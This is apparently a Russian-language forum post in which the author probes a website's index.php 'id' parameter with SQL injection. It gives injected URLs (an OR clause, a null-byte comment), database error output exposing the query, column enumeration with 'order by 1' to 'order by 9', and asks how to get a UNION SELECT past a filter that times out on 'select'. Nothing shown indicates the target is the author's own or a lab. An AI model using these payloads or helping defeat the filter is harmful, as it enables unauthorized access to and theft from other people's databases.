server.com/index.php?id=-1'+OR+`ID`+=+'202

выдает правильную страницу (SELECT * FROM `Films` WHERE `ID` = '-1' OR `ID`='202' LIMIT 1), на нем и тестирую:

server.com/index.php?id=-1'+OR+`ID`+=+'202';%00

показывает правильную страницу (ID = 202) без ошибок. Я так понимаю комментирование работает?

В чистом виде выдает:

DB ERROR: Unknown column '100' in 'order clause'

SELECT * FROM `Films` WHERE `ID` = '202' order by 100-- 1' LIMIT 1

c order+by+1 до order+by+9

выдает правильную страницу.

Как засунуть туда union select, если при слове select страница отваливается по timeout? Пробовал и в разных регистрах, и со скобками - не работает. Может есть другие запросы для "побаловаться" с базой?